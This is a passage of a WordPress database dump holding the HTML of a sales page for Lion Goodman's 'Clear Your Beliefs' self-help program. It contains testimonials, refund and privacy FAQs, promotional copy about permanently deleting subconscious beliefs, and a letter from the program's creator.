Psychotherapist, BeliefCloset Practitioner</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\r\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\r\n<strong>~ C.T., Performance and Life Coach</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\r\n<strong>– M.M., International Business Consultant</strong>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\r\n<p style="text-align: center">OR</p>\r\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Satisfaction Guaranteed</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\r\n<p>&nbsp;</p>\r\n<h1>Frequently Asked Questions</h1>\r\n\r\n<p><strong>Q: What is a virtual course?</strong></p>\r\n\r\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\r\n\r\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\r\n\r\n<p><strong>Q: How long will I have access to the course?</strong></p>\r\n\r\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\r\n\r\n<p><strong>Q: Are there scholarships available?</strong></p>\r\n\r\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\r\n\r\n<p><strong>Q: What is your refund policy?</strong></p>\r\n\r\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\r\n\r\n<p><strong>Q: How can I reach Customer Support?</strong></p>\r\n\r\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\r\n\r\n<p><strong>Q: What is your Privacy Policy?</strong></p>\r\n\r\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\r\n\r\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\r\n\r\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\r\n\r\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:21:02', '2015-07-08 14:21:02', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2228, 2, '2015-07-08 09:46:35', '2015-07-08 14:46:35', '&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nLearn to change your beliefs, and your limitations will disappear.\r\nYour possibilities will then become unlimited.</strong>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\r\n\r\nRelease pain and hurts from the past\r\nOpen to deeper, more profound love\r\nRecognize your true spiritual nature\r\nBecome more calm and less reactive\r\nRediscover the source of your personal power\r\n\r\nClear whatever stops you from taking action\r\nOpen yourself to new possibilities of success\r\nEliminate blocks and barriers easily\r\nDiscover your true purpose\r\nExpress your true magnificence\r\n\r\n<h2>How and Why It Works So Well</h2>\r\n\r\nBeliefs are the major cause of unhappiness, upsets, and limitations.\r\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\r\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\r\nYou''re in charge – you decide what you want to believe, and how far you want to go.\r\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\r\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\r\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\r\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\r\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n&nbsp;</p>\r\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\r\n<p>&nbsp;</p>\r\n<h1>Why Does This Happen?</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\r\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\r\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\r\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\r\n<p><strong>We literally create our reality with our beliefs.</strong></p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\r\n<p>&nbsp;</p>\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\r\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\r\n\r\n<strong><em>I''m not enough.</em></strong>\r\n<strong><em>I can''t do it.</em></strong>\r\n<strong><em>I''m not worthy.</em></strong>\r\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\r\n<strong><em>I''m all alone.</em></strong>\r\n\r\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\r\n<strong><em>There''s something wrong with me.</em></strong>\r\n<strong><em>I''m fundamentally flawed.</em></strong>\r\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\r\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\r\n\r\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\r\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\r\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p>The same thing is true in your subconscious mind:</p>\r\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\r\n<p><strong>It''s that simple.</strong></p>\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n\r\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\r\n\r\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\r\n\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n\r\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\r\n\r\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\r\n\r\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\r\n\r\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\r\n\r\n<p><strong> It''s that simple.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\n\r\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\r\n\r\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\r\n\r\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\r\n\r\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why We React The Way We Do</h1>\r\n\r\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\r\n\r\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\r\n\r\n<p>\r\n</p>\r\nWhy did I say that?\r\nWhat''s wrong with me?\r\nWhy didn''t I follow through?\r\nWhy did I react that way?\r\nWhat the hell just happened?\r\n\r\n<p><em></p>\r\n\r\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\r\n\r\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\r\n\r\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n\r\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\r\n\r\n<p><strong>Here''s why:</strong></p>\r\n\r\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\r\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\r\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\r\n\r\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Here''s Some Good News</h1>\r\n\r\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\r\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\r\n\r\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\r\n\r\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\r\n\r\n<h1>Imagine The Life You Desire</h1>\r\n\r\n<p><strong>Can you imagine this?</strong></p>\r\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\r\n<p>You''re no longer held back by old beliefs and stories.</p>\r\n<p>There''s no resistance to doing what needs to be done.</p>\r\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\r\n<p>&nbsp;</p>\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n\r\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\r\n\r\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\r\n\r\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\r\n\r\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>Clear Whatever Is In The Way</h1>\r\n\r\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\r\n\r\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\r\n\r\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\r\n\r\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n\r\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\r\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\r\nGive you the power to change your experiences – and your circumstances – at will.\r\nShow you how to gain mastery over your moods, perceptions, and responses.\r\n\r\n<p>&nbsp;</p>\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\r\n\r\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\r\n\r\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\r\n\r\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\r\n\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n\r\n<p>\r\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\r\n<ul><small><li>Remove resistance and barriers</li>\r\n<li>Open doors to new opportunities</li>\r\n<li>Eliminate pain and suffering from the past</li>\r\n<li>Experience more fulfillment in your relationships</li>\r\n<li>Attract more abundance and prosperity</li>\r\n<li>Increase your energy, vitality, and productivity</li></small></ul>\r\n\r\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h1>A Message from Lion Goodman...</h1>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\r\n<p>Dear Explorer:</p>\r\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\r\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\r\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\r\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\r\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\r\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\r\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\r\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\r\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\r\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\r\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\r\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\r\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\r\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\r\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\r\n<p>In gratitude, and with warm wishes for your total success,</p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\r\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Register Today and Discover What''s Possible</h1>\r\n\r\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img 